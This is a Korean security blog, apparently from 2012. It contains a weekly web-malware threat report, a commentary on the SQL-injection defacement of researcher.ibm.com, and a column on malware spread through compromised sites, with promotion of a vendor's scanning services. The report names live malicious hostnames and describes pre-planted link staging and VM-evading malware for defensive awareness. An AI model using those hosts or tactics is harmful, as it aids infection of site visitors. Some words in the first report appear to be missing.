 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며악성링크에 분석은 KAIST 사이버보안센터정보보호대학원과 공동으로 진행합니다.


- 바다란 세상 가장 낮은 곳의 또 다른 이름.

Posted by 바다란

5 3주차 국내 인터넷 위협 동향입니다.

 

서비스의 제공은 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 있도록 하기 위한 것이 주된 목적입니다.

 

금주의 특징으로는 공격에 이용되는 취약성 종류의 변화에 따라 공격 기법들도 변화가 되고 있음을 있으며, 가장 특징은 신규 악성링크는 줄어든 비율을 보이고 있으나, 악성링크로부터 감염이 되는 악성코드들은 전주 대비 대폭 증가 되었습니다결론적으로 보면 지금까지 사용 되어진 악성링크들을 반복해서 재활용을 하고 있으며 최종 설치되는 악성코드들만 변경하는 형태를 보이고 있습니다.  대응이 되지 않고 있어서 계속 악성링크를 재활용 하고 있다는 가장 원인이 것입니다.

 

금주의 특징은 다음과 같습니다.

 

 

특징

 

·   악성코드 유포자들의 전략적 행위 증가 범위 확대

·   악성코드 분석 자체를 방해하기 위한 가상머신 우회기술 적용

·   4월부터 사용되었던 주요 악성링크의 대규모 재활용 계속

·   주말에 집중된 공격에서 벗어나 주중에도 일상적인 악성코드 유포 시도들이 계속 이어짐

·   악성링크 탐지 혼선을 위한 백신과 유사한 도메인 활용 배너 

·   APT 유형 ( 악성 코드 감염 이후 내부망 스캔 활동) 꾸준히 유포

·  Mass sql i 유형 국내 유입 시작social-stats.info/ur.php 5.19 ( 해외에는 있었으나 국내로 최초 유입이 감지됨)

 

5 3주차의 공격에 이용된 취약성들을 전주와 비교해 보면 공격자들의 전략과 악성코드 전파 기법의 변화에 대해서 확인이 가능합니다.

금주의 주된 공격 취약성은  주요 취약성 6 가량에 집중이 되어 있으며 이중 여전히 패치가 더딘 것으로 보이는 Oracle Java 취약성에 대한 공격 비율이 높아지고 있는 있습니다. 사내 해당 기관이나 기업에 강력한 보안패치 권고를 해야만 하는 이유입니다. MS 패치뿐 아니라 java Flash 대한 기본 패치 정보를 제공하고 타이트 하게 관리 해야 위험을 줄일 있을 것입니다.

 

특징들을 하나씩 짚어 보면 가장 특징은 전략적 움직임을 공격그룹이 보이고 있다는 부분입니다.

 

·  전략적 변화를 하는 공격자들

악성링크의 수치는 줄었지만 기존에 정상적인 웹서비스들에 추가해둔 악성링크 ( 악성코드는 내려 오지 않는 비정상 링크 ) 대규모로 활용 하였고 그중 한곳의 경우에는 분석보고서에는 정황이 기술되어 있지만 빛스캔에서 관찰되는 변화를 보면 대규모 움직임을 보이고 있습니다.   하나의 악성링크를 이용하여 대규모로 악성코드 유포에 활용 하고 있으며 이전 사용 되었던 링크들의 재사용 비율이 대폭 증가하고 있습니다. 대응이 시급한 상황입니다.

 

말로서는 설명이 어려워 그림으로 보면 다음과 같습니다.

 

1. 공격자는 사전에 악성링크 A B,C 여러 서비스들에 넣어 둡니다. 이때에는 악성코드 유포는 발생하지 않습니다. ( 빛스캔 관측결과 최소 4 이상의 사전에 심어진 악성링크 활동이 감지 되었으며 해당 링크의 내용은 공격 시작과 동시에 동일한 악성코드 호스팅 주소로 변경이 되었습니다. - 최소 연결된 공격네트워크만 40여곳 이상이 해당 되는걸로 감지 되고 있습니다.)

 

2. 공격 시점에 도달 하여서 공격자는 악성링크 A B, C 내용을  악성링크로 변경 합니다.

 

3. 이미 공격자가 확보하여 가지고 있는 악성코드 유포 네트워크( 최소 수십여개 이상 ) 하나의 악성링크를 방문자들에게 중계하게 됩니다.

 



 

·  백신 도메인으로 가장한 형태의 악성링크 발견  (ky.alyacc.com )

·  시스템 드라이버를 대체하는 형태의 루트킷은 APT 형태이며 감염 이후 내부망을 스캔하고 정보를 수집하는 형태를 보이고 있습니다. 해당 형태는 몇주간 계속해서 나타나고 있어서 강도 높은 주의가 필요합니다.

·  악성코드 분석시에는 항상 가상머신을 이용하여 분석을 진행하고 있습니다만 금주에 발견된 악성코드 중에는 가상머신 실행을 감지하고 종료하거나 분석을 회피하도록 설계된 악성코드가 대량 유포 되었습니다. 내용은 향후 전문분석을 통해 상세하게 전달이 예정입니다.

·  게임 계정을 해킹 하는 코드들이 대량으로 유포 되고 있으며 대상 게임은  엔씨 -리니지 , 한게임 -테라 , 넥슨 -메이플스토리,엘소드, 블리자드-와우, CJ인터넷 - 피파온라인, 네오플-던파 이며 디아블로에 대한 계정 탈취 유형도 발견 것으로 보입니다.

·  항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발 있으므로 심각한 주의가 필요합니다. 더군다나 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 감염입니다.  APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다.  대응에 참고 하십시요.

 

사용된 취약성

 

- CVE 2011-3544 ( 26.4%)  Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 24.5%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 ( 20.7%) Windows Midi 취약성http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고 

- CVE 2012-0754 (16.9%)  Flash 취약성http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (10.3%)  IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

- CVE 2011-2140 (0.9%)   Flash 취약성  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2140

 

 

전주 대비 특이 사항으로는 Java applet 취약성을 노린 공격이 대폭 증가 하였고 한동안 소강 상태를 보였던 Windows Midi 관련된 공격이 급증세를 보이고 있습니다.또한 오랜된 취약성으로 분류되고 있는 IE 취약성 CVE-2010-0806 공격이 드물게 활성화 되어 이용이 되고 있습니다. MS 관련 보안패치 Oracle, Flash 업데이트를 시급하게 보완해야 부분이며 불가피한 경우 현재 공격에 주로 이용 되고 있는 취약성들에 대해서만이라도 패치를 별도 설치 하도록 유도해야 위험을 줄일 있습니다.

 

전주와 대비해 달라진 취약성 비율과 공격의 자세한 변화들에 대해서는 5 3주차 동향분석 보고서를 참고 하십시요.

 

 

금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 기관에서는 해당 IP 대역 차단이후 ( 업무 관련성 여부에 대해서는 각기관 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 있으시며 매우 높은 수치임을 아실 있습니다.

 

 

 

차단 권고 대역

 

 

서비스를 구독 하고 계시는 기업 기관에게는 메일 상에 적어 드렸으며 4월부터 5 2주차까지의 차단 영역은 그대로 유지, 금주에 추가된 영역은 2 클래스가 추가 되었습니다.

 

 

현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공할 예정이며 기본 동향에 대해서만 알려 드립니다.

시설 확장을 통해 동안 국내 도메인 추가 확보된 도메인과 해외 도메인을 추가하여 악성링크의 움직임에 대해 폭넓은 관찰을 예정하고 있습니다. 보다 정확성 있고 현실적인 위협정보들을 제공 있도록 하겠습니다.

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다.

* 정식 구독 서비스 가입 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한하여 한달간 제공 됩니다.

 

* 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며, 악성링크에 분석은 KAIST 사이버보안센터,  KAIST 정보보호대학원과 공동협력으로 운영 되고 있습니다.

 



< 5 3주차 주간 동향 요약 보고서>

Posted by 바다란

5.18일 researcher.ibm.com 메인 페이지 변조, SQL Injection에 의한 권한 획득


웹서비스 보안에 대해서 문제점과 대응방식의 변화에 대해 이야기를 한지는 아주 오래되었고 지금도 계속 하고 있다. 그러나 변화는 멀었고 아직 인식도 멀리 있는 상태이다.


문제 해결을 위해 security service를 기획하고 제안 했지만 결국에는 아무도 나서지 않아 직접 할 수 밖에 없었던 지금과 관련된 이야기다. 오늘자 기사로 researcher.ibm.com과 같은 중요 서비스에 대한 직접 해킹과 전 세계에서 가장 점유율이 높은 웹 취약성 진단 도구인 Appscan의 주인이 IBM 이라는 점은 심각한 시사점을 던져 주고 있다. 또한 필자 본인이 본 관점이 정확했음을 입증하고 있다.




< zone-h 의 researcher.ibm.com 미러 페이지>


* SQL Injection을 이용했다는 것은 시스템의 권한 획득은 물론 취약성 자체가 DB의 권한을 통해 웹서버를 통제함으로써 DB의 내용도 모두 통제 하고 있다는 것과 동일하다. 페이지 변조에만 관심을 두어서는 안된다. 지금 이런 유형의 일들은 항상 그리고 거대 규모로 일상적으로 일어나고 있는 위험들이다. 만약 변조가 없었다면 내부 침입으로 이어 졌을 것임은 당연한 일이 아닐까? 이것이 모든 기업과 기관, 국가들이 직면한 딜레마이다.



스캔 서비스의 현재 최대 덕목은  정확하고 가급적 많은 취약성의 진단으로 판정을 하고 있다. 그러나 과연 이것이 적합한 것인가? 질문에 대한 답을 볼 수 있는 사건이다. 언제나 발생 할 수 밖에 없는 그런 일들이지만 말이다.


IBM은 현재 가장 정확하고 방대한 Application scanner인 Appscan을 보유중이고 전 세계적으로 점유율도 높으며 판매도 강화하고 있는 Application Security의 주력 제품이다.


Appscan을 이용해 미국방부 및 기업들의 보안성을 강화 시켜 주는데 정작 아이러니컬 한것은 researcher.ibm.com 리서처 사이트는 Application 취약성에 의해 권한 획득을 당했다는 점이다.


< 미 국방부의 3단계 어플리케이션 보안 강화를 위한 SDLC 모델>

* 2006년 부터 진단과 수정, 보완이 시작된 것으로 알고 있지만 현재까지도 진척률은 미미하다. 그리고 진단이 완료된 서비스들은 한번도 변화하지 않았을까?. ^^; 딜레마이며 이 문제로 인해 2011년 미공군은 빠른 속도가 장점인 별도의 진단 스캐너를 공식적으로 도입한다. 완벽한 프로세스의 정착이 그만큼 어려우며 또한 현재의 SDLC 모델은 최소한 Web application에 대해서는 맞는 모델이 아니라는 입증된 결과를 보여주고 있을 뿐이다.


단 하나의 웹 서비스라면 문제는 다르다. 완벽하게 관리를 하고 체계적으로 또 실험적으로 적용 할 수 있을 것이다. 그러나 수십, 수백여개의 웹서비스를 관리해야 하는 회사나 담당 부서라면 과연 무엇을 해야 하는가? 또 무엇이 가장 필요한가?.


웹서비스의 절대과제는 널리 사용자들에게 서비스를 알리고 접점의 역할을 하는 것이지만 지금은 다른 용도로도 널리 쓰이고 있다. ( 공격자에 의해 악성코드 전파의 수단으로 이용됨.)  이미 악성코드 유포에 이용이 된다는 점은 웹서비스의 소스코드 변경을 전제로 한다. 소스코드의 변경은 권한을 가지고 있을때에만 가능하다. 매주 마다 수백여개 이상의 웹서비스들에서 무시하지 못할 수치의 악성코드들이 뿌려지고 있는 상황에서 과연 그 서비스를 운영하는 기업들은 자신의 서비스에서 악성코드를 뿌리고 있다는 것을 알기나 할까?


웹서비스의 현재 보안수준을 직접 확인 할 수 있는가?

웹서비스 진단은 언제 끝났으며 그 사이 변화나 갱신은 한번도 없었는가?  ( CEO나 회장님 지시로 한시간 만에 급조한 페이지나 이벤트들은 없었을까? .. 의문이다. 의문)

외부에서 접속이 가능한 웹 서비스들은 대체 얼마나 있으며 그 모든 것들에 대해 안전한 상태를 유지 하고 있는가?


웹서비스의 보안성 유지는 절대적인 미션이다. 그 미션의 유지에 기본이 되는 것은 100%에 가까운 보안성을 유지하는 것이 아니다. 분명히 말하지만 항상 보안성을 100% 가까이 유지 하는 것은 불가능에 가깝다.  보안 전문업체를 활용해도 마찬가지 이다. 그 원인의 첫번째는 보안도구들의 한계와 웹의 잦은 변화를 따라 갈 수 없는 현실에서 기인한다.


잦은 변화를 따라가면서 현재 전체 서비스에 대한 수준을 일정 수준 이상 유지해야 하는 절대적인 생존 법칙이 있다.  

 * 여기서의 일정 수준은 자동화된 공격 도구들에 의해서는 손쉽게 당해서는 안되는 것이며, 또한 알려진 취약성에 대해서도 기본적인 대책이 되어야 함을 의미한다. 


수준의 유지와 전체 외부 노출 서비스에 대한 관리를 위해 우리는 보안 진단 스캐너와 수많은 보안 컨설팅, 관제 등의 서비스들을 활용하고 진단 인력을 동원한다. 그중에서 진단 스캐너의 목적은 100%에 가까운 진단이 가능한 것도 있어야 하지만 모든 것에 대한 일정수준 유지에는 극명한 한계를 가지고 있어서 불가능한 면이 많다. 그렇다면 일정수준 유지를 위해서는 무엇이 필요한가?


수준유지를 위해 필요한 포인트는 정확하고 많은 취약성의 진단이 아니라 가장 빠르고 손쉽게 점검이 가능한가?..접근성은 좋은가?, 결과는 명쾌한가? 웹 서비스 개발속도에 전혀 영향을 주지 않을만큼 빠르고 심플한가가..핵심이 되어야 가능해 진다.



긴 점검 시간과 복잡한 결과, 사전만한 사이즈의 결과 리포트 ( 어떨때 보면 전문가들도 가르치려 하는 그런 뉘앙스를 느낄 때도 있다. )로는 현재의 문제를 극복하지 못한다. 문제의 핵심을 직시해야 한다.


현황:  

- 웹 서비스는 변화가 많다. ( 잦은 변경)

- 보안 취약성을 제대로 이해하는 개발자도 부족하고 진단 보고서를 이해하는 개발자는 더욱 적다.


위의 현황은 현실에서는 부정 할 수 없는 내용이다. 전문가들 조차도 제대로 이해를 못하는 상황에서 개발자들까지 이해를 한다는 것은 뜬구름일 뿐이다.  특히 한국의 경우 웹 개발은 개발 프로젝트로 제대로 인정 하지 않으며 모든 업무에서 기한의 압박과 하찮은 일이라는 시선 같은 이중고에 시달리고 있다. 이 상황에서 보안을 하라는 것은 불가능에 가깝다. 특히 사전과 같은 두께의 보고서와 처음보는 낯선 용어들의 나열은 좌절감을 극대화 시킬 뿐이다.



현실:


- 고객사들은 100%에 가까운 모든 취약성을 진단하고 제거 하기를 희망한다. 

- 스캐너들은 점점 더 무거워지고 어쩌면 공격도구에 가까운 기법들을 사용한다.

- 점점 더 진단 보고서들은 난해해지고 두꺼워 진다. 그래야 전문성 있게 보이나 보다.

- 모든 웹서비스들을 진단 하는데에는 엄청난 시간과 인력, 비용이 소요된다. 그래서  샘플링으로 진단을 할 수 밖에 없다.


- 즉 일년에 한번 진단 하기도 힘든 웹서비스들은 늘어만 간다.

- 진단을 받아도 외부 노출된 웹 서비스들중 방문자가 많은 사이트, 중요하다고 생각되는 사이트만을 선정하여 진단을 한다.



현실에서의 문제와 요구사항들은 문제해결과는 다른 길로 인도하고 있다. 만약 충분한 전문인력을 보유하고 있고 비용에 대해 부담이 없는 기업이라면 얼마든지 전체에 대해 100% 가까운 진단과 수준을 유지하는 것에 기꺼이 박수친다. 그러나 문제를 직시해 보자.  보안진단 비용이 웹서비스 개발과 운영 비용 보다도 휠씬 더 많이 소요 된다면 과연 그 웹서비스를 계속 유지 하는 것이 합당 할까? .. 이 질문에 대해 답을 할 수 있어야 한다. 모든 문제를 풀때 정답에 가까운 것은 비용 대비 효과가 충분한가 하는점이다.  



문제의 직시:


- 웹 서비스는 수시로 변경 되고 갱신된다. 작은 변경에도 DB까지 직접 공격 당하는 취약성은 언제든지 발생 될 수 있다.


- 많은 웹서비스들이 있는 회사라면 전체의 상황을 일정 수준 유지 할 수 있어야 한다. 외부 노출된 모든 서비스들이 대상이 되어야만 한다.


- 진단보고서들을 이해하고 적용 할 수 있는 사람이 없다. 그냥 보고서만 받고 묵혀둔다. 일단은 면피용이다.


- 취약성 스캐너의 사용과 결과를 이해 할 수 있는 사람이 내부에 없다.  ( 즉 보고서가 나와도 해독불가의 상황)


- 중요한 서비스의 기준은 방문자가 많은 서비스가 아니라 외부 노출된 모든 서비스가 중요하다. ( 모든 서비스는 내부망으로 이어져 있다. )



결론적으로는 이렇다.


문제의 핵심은 웹 서비스의 잦은 변화에도 손쉽게 사용 할 수 있고 결과도 직관적이며 접근성도 매우 높은 심플한 보안서비스가 절대적으로 필요하다는 것.  100%를 추구하는 것은 1~2년에 한번씩 진행해도 된다. 그와는 별개의 수준 유지를 위한 도구나 서비스가 필요하다는 점이다. 


정말 중요한 것은 10개의 서비스중 4개는 100%이고 나머지 6개는 50% 미만이라면 그 기업의 안전도는 50% 미만인 것이다. 평균은 가장 보안 수준이 낮은 서비스가 평균이 된다. 우린 이 평균을 끌어 올려야 손쉽게 당하지 않으며 일정 수준의 관리가 가능해 지는 것이다. 모든 것은 연결 되어 있다. DMZ Zone에 포함된 서버들, DB에 접근이 가능한 모든 웹서비스들은 치명적이다. 방문자가 많고 중요도에 따라 우선 순위를 정하는 것은 아무런 의미가 없다는 점이다. 가장 관리가 안되는 서비스의 해킹은 상대적으로 쉬울 것이다. 또 그 서비스와 연결된 내부망은 어떻게 보호 할 수 있을까? 


IBM의 해킹을 보면서 ( 역설적이게도 가장 잘 진단한다고 하는 취약성에 의해 당했다.) 처음 서비스 모델의 진단서비스를 기획할 수 밖에 없었던 5~6년전의 경험들이 눈앞에 떠올라 길게 써본다. 


강력한 보안 진단 제품을 가지고 있는 IBM 조차도 전체의 일정수준 유지에는 어려움을 겪고 있다. 이 상황에서 일반 기업들이 유지 할 수 있을 것이라는 점은 상식을 벗어난다. 필자가 개발한 서비스에 대한 언급도, 설명도 할 필요가 없다. 그 필요성과 존재 이유를 가장 잘 설명해 주는 예가 눈 앞에 있는데 무엇을 더 설명 해야 할까?


입 아프게 말을 할 필요가 없다. 앞으로도 계속 될 문제들이며, 우린 아직 정리도 못한 상황이다. 즉 계속 될 문제라는 점은 확실하다. 


* 한국내에서도 일정 규모 이상의 공공 사업에는 Secure coding을 적용 한다고 한다. 그 Secure coding 이라는 것은 진단 스캐너 보다도 호흡이 긴 작업이다. C/S 베이스의 코딩에 대해서는 강력하게 추천하나 이 Secure coding이 웹 베이스까지 확장 되는 것에 대해서는 우려를 표시 할 수밖에 없다. 어플리케이션 진단 스캐너 조차도 수준 유지와 꾸준한 관리가 어려운 판국에 더 긴 주기를 가진 것으로 보호를 하겠다는 것은 넌센스감도 되지 않는다. 현실을 모르면 배는 산에 올라가도 산이 산인줄을 모른다. 지금이 그 상황이다. 


Secure coding은 권고로 하되 전체의 외부 노출 서비스를 일정수준 유지하고 체크 할 수 있는 지수의 운용, 효율적 점검 방안의 수립이 휠씬 더 필요한 상황이다.




-바다란



Posted by 바다란


- 오늘자 보안인 기고글입니다. 전 주현씨야  인식개선을 위해 워낙 많은 노력을 기울여 오고 계신 분이라 도움을 드리고 싶었는데 이런 형태로 밖에는 아직 안되네요. 참고하세요.


Malware Launch Detected!

바다란 보안컬럼니스트

 

어찌 보면 지금의 Malware는 인터넷 인프라에서 핵과 같은 폭발력을 지니고 있을 수도 있다. 작은 단초를 무시하면 큰 사고로 이어지는 것은 언제나 당연한 일이다.

 

1930년대 초 미국의 한 보험회사의 관리자였던 하인리히는 교통사고를 분석해 독특한 법칙을 발견 하였다고 한다. 한번의 대형 사고가 나기 이전에 29번 이상의 경미한 사고와 300번 가량의 징후가 발견 된다는 이른바 하인리히의 법칙을 발표하게 된다. 이 논리의 핵심은 모든 큰 사고가 발생 되기 이전에는 반드시 징후가 있으며 조짐들이 존재한다는 것이다. 갑작스런 대형 사고는 없다는 점이다이 규칙은 지금의 인터넷 세상과 공격자들의 역량에도 동일하게 적용이 될 수 있다.

 

지금까지 우리가 겪은 수많은 사건 사고들 중 근래 5~6년간 겪었던 공격이나 피해 유출의 사례는 이전과 비교해 얼마나 더 심각성을 띄고 있는지 우리는 인지하고 있을까? 매번 반복되는 피해와 공격에 대해 무감각해진 상태는 아닌지 돌아 봐야 한다. 하인리히의 법칙에서 의미 하듯이 1:29:300의 징후와 사고들에서 우리는 1에 해당하는 대형 사고를 얼마나 많이 겪었던가? 1.25 대란, 3.4 DDoS, 7.7 DDos, 농협의 사고, 그 외 헤아릴 수 없이 많았던 정보 유출 사고들은 모두 사소한 징후라고 볼 수 있을까?

 

수많은 대형사고들에 앞서 징후들은 분명히 있었고 그 징후를 제대로 보지 못한 문제와 실제 영향을 가지는 대응을 못했기에 계속 발생 되고 있는 상황 속에서 지금 우리는 무엇이 먼저 이고 어떤 것을 중요하게 놓고 진행 해야 하는지에 대해 판단도 어려운 상황이라 할 수 있다.

 

2007년에  작성하여 공개한 IT서비스의 위험과 향후 대응 의 공개문서에서 언급된 많은 문제들은 그 이후 5년의 시간이 흐른 지금 개선은 말할 것도 없이 공격 기술과의 더 큰 격차 발생으로 심각한 상황에 직면해 있다.

 

시일이 지난 이야기이지만 지금의 상황도 달라진 것이 없다. MS Malware Protection Center의 통계치를 보면 국내의 환경이 어떤 상황인지 좀 더 쉽게 인식 할 수 있다. 이 표에서 언급된  CVE 2011-2110 Flash Player의 취약성을 이용한 공격으로서 관련 정보는 다음에서 확인 할 수 있다. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110

 

 2011 6월에 조사된 데이터이며 그 데이터를 살펴보면 지금 어떤 상황에 처해 있는지 한 단면을 통해 분명하게 확인 할 수 있다.

 

<ref:http://blogs.technet.com/b/security/archive/2011/07/18/a-very-active-place-the-threat-landscape-in-the-republic-of-korea.aspx  >

 

본 조사결과가 의미하는 바는 Flash 취약성을 이용한 공격에 대해 전 세계의 탐지 데이터를 가지고 비교해 보았더니 한국에서 발생된 공격이 전 세계의 거의 90% 가량을 차지함을 보이고 있다. 또한 모든 급등 기간들은 주말에 집중됨을 알 수 있다. ,,일에 걸친 공격의 급등이 전 세계 모든 국가들에 비해 월등함을 확인 할 수 있고 수치 또한 매우 높은 비율을 차지하고 있는 상태이다. 2011 6월의 조사결과이나 이 현상은 지금도 달라지지 않았고 더 심화되고 있다.

 주말마다 급증하는 악성코드에 대한 현상은 일상적인 이야기이지만 MS외에 Kaspersky lab에서 운영하는 Securelist를 통해서 보는 국내의 위험도 동일함을 볼 수 있다.

 


<ref: securelist.com>

모든 악성코드의 급증한 기간은 주말을 표시하고 있으며 악성코드의 대부분이 트로이쟌 및 백도어, 계정 탈취형 악성코드가 다수를 차지하고 있다. 해외기업들이고 또한 백신에 관련된 기업들의 한계는 명확하다. 악성코드가 발견된 이후에 통계가 누적 될 수 밖에 없으며 최초의 공격코드들이나 백신에 탐지되지 않는 악성코드들에 대한 누계는 심각할 정도로 빠져 있을 수 밖에 없다. 위의 MS Kaspersky의 통계가 의미하는 점은 알려진 악성코드에 의한 공격도 주말 집중이 심각할 정도로 높으며 또한 한국 내에 대한 공격이 전 세계에서 가장 높은 비율을 차지함을 보여 주고 있다또 다른 통계치는 국내 보안업체인 빛스캔㈜에서 수집한 통계 정보로서 동일한 경향을 확인 할 수 있다

 


빛스캔에서 수집된 정보는 악성코드의 종류에 관계 없이 정상적인 웹서비스의 소스코드를 공격자가 변경하여 모든 방문자들에게 악성코드가 배포 되게끔 만들어 주는 Malware link에 대한 통계치 이다. 즉 신규 Flash 공격 코드나 IE, Windows Media, Java에 대한 공격들이 발생 되는 것과 관계없이 위험성에 대해서 인지 할 수 있는 통계라고 할 수 있다. 빛스캔의 통계에서도 주말에 집중된 공격들을 볼 수 있으며 하나의 악성링크에서는 다양한 공격들이 사용자 환경에 맞추어서 발생이 된다.

 



< 2011.12.1~ 2012.2.4일간의 웹서비스에 추가된 악성링크 발견 수치 >

2011.12.1일부터 2012.2.4일까지의 악성링크에 대한 발견 수치만 보아도 주말 공격은 여전히 계속 되고 있다. 악의적인 링크중 하나에서 사용자 PC로 내려오는 악성코드에 대해서 Virus total을 이용해 탐지여부를 확인한 화면을 보면 43개의 주요 백신에서 5개만 탐지됨을 볼 수 있다.



 

최근의 공격 동향을 보면 웹서비스에 특정 링크를 실행 되도록 넣어두고 ( 일반적으로는 JS 파일 혹은 html 내에 직접 넣기도 한다. ) 사용자 PC의 환경에 맞춰서 다양한 공격코드를 맞춤 형식으로 공격하여 실제 악성코드를 사용자 PC에 설치한다맞춤형식의 공격에 이용되는 취약성들이 IE 취약성, Java 취약성, Windows Media 취약성, Flash 취약성 들이며 현재 공격 성공률은 60%라고 분석 되어 있다. (http://www.boan.com/news/articleView.html?idxno=6335) 10명의 방문자중 무조건 6명 이상은 감염이 된다는 것이다이런 악성링크들이 일 평균 방문자가 최소 십만 이상인 사이트들 수십 곳에서 동시에 뿌려진다면 감염 수치는 얼마나 될까상상하기 힘든 수치가 나올 것임은 분명하다.



< 공격코드의 구조>

백신에 탐지도 되지 않는 악성코드들이 순식간에 웹 서비스 이용자들 다수에게 전파가 되고 감염이 되는 지금의 시점은 사건의 필요충분 조건을 완벽히 갖추고 있다고 볼 수 있다. 하인리히 법칙에서 말하는 1:29:300에서 1이 발생될 가능성이 매우 높다는 것이다. 이미 300번 가량의 징후와 29번 이상의 경미한 사고들은 이미 발생한지 오래 되었으며 이제 언제 사건사고가 발생해도 이상하지 않은 상황에 처해 있다.

 

빠른 인터넷 속도와 인터넷을 이용한 상거래의 활성화가 일반적인 한국에서 어쩌면 악성코드의 공격이나 유포가 활발한 것은 당연할 수 밖에 없다. 그렇다면 대응은 어떻게 해야 하는가?

 

대응을 하는 가장 기본적인 자세는 상태에 대한 인식이 먼저 되어야만 한다. 또한 문제 해결을 위해서는 전략이 있어야 한다. 가장 중요한 것은 문제가 무엇인지를 아는 것부터 일 것이다.

 

문제는 몇 가지로 간추려 질 수 있다. 취약한 웹서비스 (대규모 유포 방안으로 활용) , 정교해진 악성코드 유포 기술 , 탐지를 우회하는 악성코드 정도이고 이 문제의 해결은 기존의 방안과는 다른 차원에서 접근을 해야 한다. 이미 문제의 해결책과 노력들은 충분히 있었으나 지금까지의 노력으로는 문제를 극복하기가 어려워 보인다. 따라서 방향성 차원에서 변화가 필요해 보인다.

 

장기적으로는 웹서비스의 안정성 강화가 필수적이지만 잦은 변경과 다양한 서비스 환경은 일정수준의 안정성 강화라는 목표와는 괴리감이 크다. 또한 악성코드의 유포 범위의 제한은 일단 대규모적인 유포를 막고 범위를 좁힌다는 관점이지만 웹서비스를 통한 대규모 유포라는 현재의 상황에서는 현실적인 어려움이 있다두 가지 전략적 목표 모두 어려움에 처한 상황을 넘어 설 수 있는 기본적인 대안을 제시하고는 있으나 서비스의 확산이나 인식개선에는 부족함이 있을 수 밖에 없다. 이 문제의 해결을 위해 오랫동안 노력해 왔으나 지금도 부족함이 있다.  가장 중요한 점은 아직도 대부분의 사람들이 현재 상태의 심각성과 위험성에 대해 제대로 인지를 못하고 있다는 점이다. 본 기고 글로 현재 우리가 처한 상황에 대해 진지하게 인식을 하였으면 한다.

 - 바다란 세상 가장 낮은 곳의 또 다른 이름


*현재 빛스캔에서는 유포지 확인 서비스 ( 인위적으로 공격자가 추가한 악성링크의 존재 유무 확인 서비스), 취약성 진단 서비스를 온라인에서 제공하고 있으며 각 서비스 모두 단순한 회원가입과 클릭만으로 확인 할 수 있도록 되어 있다. 특히 공익적인 목적을 위해 유포지 확인 서비스의 경우는 무상으로 오픈 되어 있으므로 본인이 관리하는 사이트가 악성코드 유포에 이용 되고 있지는 않은지? 자신도 모르는 외부 링크들이 연결 되어 있지는 않은지에 대해서 확인을 하는데 요긴하게 사용 할 수 있다.

취약성 진단 서비스의 경우 DB 훼손이나 서비스 장애가 발생되지 않도록 구성 되어 있으며 온라인 상에서 모든 URL내의 인자들에 대해서 진단이 가능하도록 되어 있다. 현재 서비스 제공은 유상으로 되어 있으나 서비스 금액 자체는 공익성을 목적으로 하고 있어서 비교하기 어려울 정도로 저가에 제공 되고 있다. 서비스의 이용은 scan.bitscan.co.kr 에서 확인 할 수 있다.

대규모 유포에 대한 탐지 시스템을 내부에서 운영하고 있으며 탐지 내역에 대한 분석은 KAIST 사이버보안연구센터가 담당하고 있으며 분석된 내용들은 연간 서비스 가입 고객에 한해 유상으로 제공 되고 있다. 국내의 심각한 현실과 실질적인 공격에 대한 분석이 이루어 지고 있으며 본 정보제공 서비스에 대한 문의는 info@bitscan.co.kr 로 요청 할 수 있다.

Posted by 바다란

History of p4ssion (바다란) - 2011.12.06 (계속 갱신 예정)

 

15년 가까이 이 분야를 보면서 여러 활동을 했었습니다. 본 컨텐츠는 여기저기 흩어져 있는 기록과 문서를 종합하기 위해 작성 합니다. 또 지난 십 년 이상의  IT관련 중요 이슈들에 대한 Security 측면의 내용들과 거기에 대한 기록들도 일부 보실 수 있을 것입니다. 공개문서나 컬럼만을 기준으로 정리 하도록 하겠습니다.

 

1998.해커의 길 그리고 나의 길  http://p4ssion.com/233

1999. 프로그래머가 되는 길http://p4ssion.com/232

2002.8 Threat of china – 중국발 해킹에 대한 최초 보고서. 이때부터 향후 중국의 공격기술에 대해 심각한 주의를 기울여야 된다고 경고함. (이 당시만 해도 중국은 체계적이고 고급화된 역량을 보유 하지는 못했으며 외부 공개된 공격기술의 집합을 이용 했습니다. 지금은 독자적인 도구와 공격기법으로 무장하고 있죠. 10년 가까운 시간이 흐른 지금은 전 세계 누구도 부정하지 못할 사안입니다만 과연 2002년에도 그랬을까요?)


2002.8 브라질 해킹 그룹분석 중국에 이어 브라질 해킹 그룹에 대한 분석과 영향에 대한 문서

 

2002.10 Critical Alert for Cyber terror – 이 또한 국내외를 포함하여 최초의 SCADA & DCS 기반시설에 대한 문제와 대응 방안을 설명한 종합문서. ( 이 당시 국내외를 막론하고 SCADA DCS에 대해서 이해하는 사람도 매우 극소수이고 더군다나 보안의 관점에서 보는 사람은 거의 없었습니다. 전 세계적으로 매우 극소수.. 그러나 이건 2010년의 Stuxnet과 현재의 듀큐로 인해 확실하게 증명이 되죠. 너무 빠른 것도 문제이긴 합니다. )

 

